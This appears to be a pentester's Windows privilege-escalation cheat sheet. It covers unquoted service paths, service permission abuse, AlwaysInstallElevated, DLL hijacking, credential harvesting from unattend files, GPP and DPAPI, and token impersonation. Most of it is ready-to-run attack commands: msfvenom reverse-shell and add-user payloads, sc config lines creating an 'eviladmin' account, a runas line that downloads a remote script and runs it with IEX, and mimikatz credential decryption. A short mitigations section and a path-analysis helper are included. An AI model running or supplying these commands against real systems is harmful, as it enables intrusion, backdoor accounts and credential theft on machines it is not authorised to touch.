Privilege Escalation
Options
- Missing Patches
- Automated Deployment and Auto Logon Passwords
- AlwaysInstallElevated (any user can run MSI as SYSTEM)
- Misconfigured Services
Guides
- https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
- Windows Privilege Escalation Fundamentals: http://www.fuzzysecurity.com/tutorials/16.html
Tools
- https://github.com/pentestmonkey/windows-privesc-check/raw/master/windows-privesc-check2.exe
- BeRoot: https://github.com/AlessandroZ/BeRoot/tree/master/Windows
- Windows-Exploit-Suggester: https://github.com/GDSSecurity/Windows-Exploit-Suggester
- Check Insecure Services: https://gist.github.com/wdormann/db533d84df57a70e9580a6a2127e33bb
Metasploit
On 32-bit systems:
local_exploit_suggester
On 64-bit systems:
search exploit/windows/local
PowerUp
PowerUp to check for all service misconfigurations:
Invoke-AllChecks
Service Unquoted Path
Get-ServiceUnquoted -Verbose
Get-WmiObject -Class win32_service | fl *
When service path is unquoted:
C:\PROGRAM FILES\SUB DIR\PROGRAM NAME
Areas we can place files for exploit are marked with *
C:\PROGRAM*FILES\SUB*DIR\PROGRAM*NAME
Examples:
c:\program.exe files\sub dir\program name
c:\program files\sub.exe dir\program name
c:\program files\sub dir\program.exe name
Service binary in a location writable to current user
Replace the binary to gain code execution.
Get-ModifiableServiceFile -Verbose
Service can be modified by current user
Get-ModifiableService -Verbose
Techniques
Service Unquoted Path
exploit/windows/local/trusted_service_path
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
Leads to running:
C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\Program.exe
C:\Program Files (x86)\Program Folder\A.exe
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
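To triage the output of the wmic query above, the following added example (not code from the original page or the linked guides) models how CreateProcess resolves an unquoted ImagePath and flags the candidate locations whose parent folder is writable, so the ACLs of exactly those folders can be fixed. The sample path and writable folder are constructed from the insecure setup below; the "stop at the first .exe-suffixed prefix" rule is a simplification of the real lookup, which stops at the first file that exists.

```python
import ntpath

# Constructed sample taken from the page's insecure setup: the service
# ImagePath and the folder that icacls made writable for Everyone.
SAMPLE_IMAGE_PATH = r"C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe"
SAMPLE_WRITABLE_DIRS = [r"C:\Program Files (x86)\Program Folder"]


def unquoted_path_candidates(image_path: str) -> list[str]:
    """Executables CreateProcess tries, in order, for a service ImagePath.

    A quoted path is unambiguous. An unquoted path containing spaces is
    split at every space; each prefix is tried with '.exe' appended until
    a prefix that already ends in '.exe' is reached (the intended binary,
    or an earlier token that happens to carry the extension).
    """
    image_path = image_path.strip()
    if image_path.startswith('"'):
        return [image_path[1:].split('"', 1)[0]]  # text inside the quotes
    tokens = image_path.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            candidates.append(prefix)  # resolution stops at the real binary
            break
        candidates.append(prefix + ".exe")
    return candidates


def _norm_dir(path: str) -> str:
    return ntpath.normpath(path).rstrip("\\").lower()


def hijackable_candidates(image_path: str, writable_dirs) -> list[str]:
    """Candidates whose parent folder is in writable_dirs: planting a file
    there (or replacing the final binary) gets it run with the service's
    privileges, so those are the ACLs to fix. Case-insensitive match."""
    writable = {_norm_dir(d) for d in writable_dirs}
    return [c for c in unquoted_path_candidates(image_path)
            if _norm_dir(ntpath.dirname(c)) in writable]


if __name__ == "__main__":
    for candidate in unquoted_path_candidates(SAMPLE_IMAGE_PATH):
        print("tries:", candidate)
    print("exposed:", hijackable_candidates(SAMPLE_IMAGE_PATH, SAMPLE_WRITABLE_DIRS))
```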
Insecure Setup:
C:\Windows\System32>sc create "Vulnerable Service" binPath= "C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe" start= auto
C:\Windows\System32>cd C:\Program Files (x86)
C:\Program Files (x86)>mkdir "Program Folder\A Subfolder"
C:\Program Files (x86)>icacls "C:\Program Files (x86)\Program Folder" /grant Everyone:(OI)(CI)F /T
Folder & Service Executable Privileges
- When new folders are created in the root they are writable for all authenticated users by default. (NT AUTHORITY\Authenticated Users:(I)(M))
- So any application that gets installed on the root can be tampered with by a non-admin user.
- If binaries load with SYSTEM privileges from this folder it might just be a matter of replacing the binary with your own one.
- https://msdn.microsoft.com/en-us/library/bb727008.aspx
If the folder is writable, drop an exe and use "Service Unquoted Path" to execute it:
icacls "C:\Program Files (x86)\Program Folder"
If the service exe is writable by everyone, a low-privilege user can replace it with another binary:
icacls example.exe
F = Full Control
CI = Container Inherit - This flag indicates that subordinate containers will inherit this ACE.
OI = Object Inherit - This flag indicates that subordinate files will inherit the ACE.
Service Permissions
exploit/windows/local/service_permissions
Approach 1 - Check permissions of service
subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service" /display
If the service is editable, change the ImagePath to another exe:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Vulnerable Service" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\testuser\AppData\Local\Temp\Payload.exe" /f
or create a local admin with:
sc config "Vulnerable Service" binpath= "net user eviladmin P4ssw0rd@ /add"
sc config "Vulnerable Service" binpath= "net localgroup Administrators eviladmin /add"
Approach 2 - Check services a given user can edit
accesschk.exe -uwcqv "testuser" *
AlwaysInstallElevated
exploit/windows/local/always_install_elevated
[HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer]
"AlwaysInstallElevated"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"AlwaysInstallElevated"=dword:00000001
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Installing MSI:
msiexec /quiet /qn /i malicious.msi
Payload Generation:
msfvenom -f msi-nouac -p windows/adduser USER=eviladmin PASS=P4ssw0rd@ -o add_user.msi
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST=192.168.2.60 LPORT=8989 -f exe -o Payload.exe
msfvenom -f msi-nouac -p windows/exec cmd="C:\Users\testuser\AppData\Local\Temp\Payload.exe" > malicious.msi
Task Scheduler
- On Windows 2000, XP, and 2003 machines, scheduled tasks run with SYSTEM privileges.
- Works only on Windows 2000, XP, or 2003
- Must have local administrator
> net start "Task Scheduler"
> time
> at 06:42 /interactive "C:\Documents and Settings\test\Local Settings\Temp\Payload.exe"
DLL Hijacking (DLL preloading attack or a binary planting attack)
- https://msdn.microsoft.com/en-us/library/windows/desktop/ff919712(v=vs.85).aspx
- Search order: https://msdn.microsoft.com/en-us/library/windows/desktop/ms682586(v=vs.85).aspx
When an application dynamically loads a dynamic-link library without specifying a fully qualified path name, Windows attempts to locate the DLL by searching a well-defined set of directories in a particular order, as described in Dynamic-Link Library Search Order.
The directory from which the application loaded.
The system directory.
The 16-bit system directory.
The Windows directory.
The current directory.
The directories that are listed in the PATH environment variable.
- Services running as SYSTEM do not search the user's PATH environment variable.
Identify processes / services
- Use procmon (Process Monitor: https://technet.microsoft.com/en-us/sysinternals/processmonitor.aspx).
- Filter: Result = NAME NOT FOUND and Path ends with dll
- Look at the registry key ServiceDll of services (under the service's Parameters subkey).
Windows 7
IKE and AuthIP IPsec Keying Modules (IKEEXT) – wlbsctrl.dll
Windows Media Center Receiver Service (ehRecvr) – ehETW.dll
Windows Media Center Scheduler Service (ehSched) – ehETW.dll
Can run Media Center services over command line:
schtasks.exe /run /I /TN "\Microsoft\Windows\Media Center\mcupdate"
schtasks.exe /run /I /TN "\Microsoft\Windows\Media Center\MediaCenterRecoveryTask"
schtasks.exe /run /I /TN "\Microsoft\Windows\Media Center\ActivateWindowsSearch"
Windows XP
Automatic Updates (wuauserv) – ifsproxy.dll
Remote Desktop Help Session Manager (RDSessMgr) – SalemHook.dll
Remote Access Connection Manager (RasMan) – ipbootp.dll
Windows Management Instrumentation (winmgmt) – wbemcore.dll
Audio Service (STacSV) – SFFXComm.dll SFCOM.DLL
Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) – DriverSim.dll
Juniper Unified Network Service(JuniperAccessService) – dsLogService.dll
Encase Enterprise Agent – SDDisk.dll
Mitigations
CWDIllegalInDllSearch
- Allows the user to change the DLL search path algorithm
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager]
CWDIllegalInDllSearch
1, 2 or ffffffff ?
The directory from which the application loaded
32-bit System directory (C:\Windows\System32)
16-bit System directory (C:\Windows\System)
Windows directory (C:\Windows)
[ dlls not loaded ] The current working directory (CWD)
Directories in the PATH environment variable (system then user)
SetDllDirectory
- Removes the current working directory (CWD) from the search order
SetDllDirectory("C:\program files\MyApp\"):
The directory from which the application loaded
[ added ] C:\program files\MyApp\
32-bit System directory (C:\Windows\System32)
16-bit System directory (C:\Windows\System)
Windows directory (C:\Windows)
[ removed ] The current working directory (CWD)
Directories in the PATH environment variable (system then user)
SetDllDirectory("")
The directory from which the application loaded
32-bit System directory (C:\Windows\System32)
16-bit System directory (C:\Windows\System)
Windows directory (C:\Windows)
[ removed ] The current working directory (CWD)
Directories in the PATH environment variable (system then user)
SafeDllSearchMode
- Enabled by default
- Can be disabled via [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager]
- Calling SetDllDirectory("") or SetDllDirectory("C:\program files\MyApp\") disables SafeDllSearchMode and uses the search order described for SetDllDirectory.
DEV
- LoadLibraryEx (additional argument)
- SetEnvironmentVariable(TEXT("PATH"), NULL)
- Change the default installation folder to C:\Program Files
- Use a fully qualified path when loading DLLs
- Use the SetDllDirectory("") API to remove the current working directory from the search order
- If software needs to be installed on the root, check that no binaries need SYSTEM privileges
- If SYSTEM privileges are required, change the ACLs of the folder
- Remove the path entry from the SYSTEM path variable if not needed
When SafeDllSearchMode is enabled
The directory from which the application loaded
32-bit System directory (C:\Windows\System32)
16-bit System directory (C:\Windows\System)
Windows directory (C:\Windows)
The current working directory (CWD)
Directories in the PATH environment variable (system then user)
When SafeDllSearchMode is disabled
The directory from which the application loaded
[ moved up the list ] The current working directory (CWD)
32-bit System directory (C:\Windows\System32)
16-bit System directory (C:\Windows\System)
Windows directory (C:\Windows)
Directories in the PATH environment variable (system then user)
Stored Credentials
C:\unattend.xml
C:\sysprep.inf
C:\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b /c
dir c:\*ultravnc.ini /s /b /c
dir c:\ /s /b /c | findstr /si *vnc.ini
findstr /si password *.txt *.xml *.ini
findstr /si pass *.txt *.xml *.ini
Unattended Installations
post/windows/gather/enum_unattend
- Look for the UserAccounts tag of Unattend.xml, sysprep.xml and sysprep.inf across the system, including:
C:\Windows\Panther\
C:\Windows\Panther\Unattend\
C:\Windows\System32\
C:\Windows\System32\sysprep\
- Microsoft appends "Password" to all passwords within Unattend files before encoding them.
Group Policy Preferences (GPP)
- Introduced from Windows Server 2008. GPP allows configuration of domain-attached machines via group policy.
- GPPs are stored in the SYSVOL share, which is world-readable to authenticated users.
- Domain machines periodically reach out and authenticate to the Domain Controller using the domain credentials of the logged-in user and pull down policies.
- Group Policies for account management are stored on the Domain Controller in Groups.xml files buried in the SYSVOL folder; cpassword is used to set passwords for the Local Administrator account.
- Password is AES encrypted using a published key: https://msdn.microsoft.com/en-us/library/Cc422924.aspx
- Metasploit: post/windows/gather/credentials/gpp
- PowerSploit: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
Decrypt encrypted password:
gpp-decrypt $cpassword
Get-GPPPassword
Get-NetOU -GUID "{4C86DD57-4040-41CD-B163-58F208A26623}" | %{ Get-NetComputer -ADSPath $_ }
# All OUs linked to the policy | list all domain machines tied to each OU
- Future - Local Administrator Password Solution (LAPS): https://www.microsoft.com/en-us/download/details.aspx?id=46899
Token Impersonation
PowerSploit / Incognito
List all tokens
Invoke-TokenManipulation -ShowAll
List all unique and usable tokens
Invoke-TokenManipulation -Enumerate
Start new process with token of a user
Invoke-TokenManipulation -ImpersonateUser -Username "domain\user"
Start new process with token of another process
Invoke-TokenManipulation -CreateProcess "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ProcessId 500
cmdkey
- Creates, lists, and deletes stored user names and passwords or credentials.
- Usable with "runas /savecred"
cmdkey /list
Run a command as admin:
runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.2/admin.ps1')"
Find all runas shortcuts:
Get-ChildItem "C:\" *.lnk -Recurse -Force | Select-Object -ExpandProperty FullName | Out-File shortcuts.txt
ForEach ($file in gc .\shortcuts.txt) { Write-Output $file ; gc $file | Select-String runas }
Windows Data Protection API
Locating credential files
cmd /c "dir /S /AS C:\Users\security\AppData\Local\Microsoft\Vault & dir /S /AS C:\Users\security\AppData\Local\Microsoft\Credentials & dir /S /AS C:\Users\security\AppData\Local\Microsoft\Protect & dir /S /AS C:\Users\security\AppData\Roaming\Microsoft\Vault & dir /S /AS C:\Users\security\AppData\Roaming\Microsoft\Credentials & dir /S /AS C:\Users\security\AppData\Roaming\Microsoft\Protect"
Transfer
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\security\AppData\Roaming\Microsoft\Credentials\51AB168BE4BDB3A603DADE4F8CA81290"))
[IO.File]::WriteAllBytes("51AB168BE4BDB3A603DADE4F8CA81290", [Convert]::FromBase64String("<base64 string produced by the previous command>"))
Extract the master key GUID (guidMasterKey) from the credential file - https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials
dpapi::cred /in:51AB168BE4BDB3A603DADE4F8CA81290 /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller
Examine master key file
dpapi::masterkey /in:0792c32e-48a5-4fe3-8b43-d93d64590580 /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller
Decrypt credential blob
dpapi::cred /in:51AB168BE4BDB3A603DADE4F8CA81290
Using Kernel Exploit
Installed updates:
wmic qfe get Caption,Description,HotFixID,InstalledOn
KiTrap0d
References
- https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
- http://www.greyhathacker.net/?p=738
- https://toshellandback.com/2015/11/24/ms-priv-esc
- https://www.toshellandback.com/2015/08/30/gpp/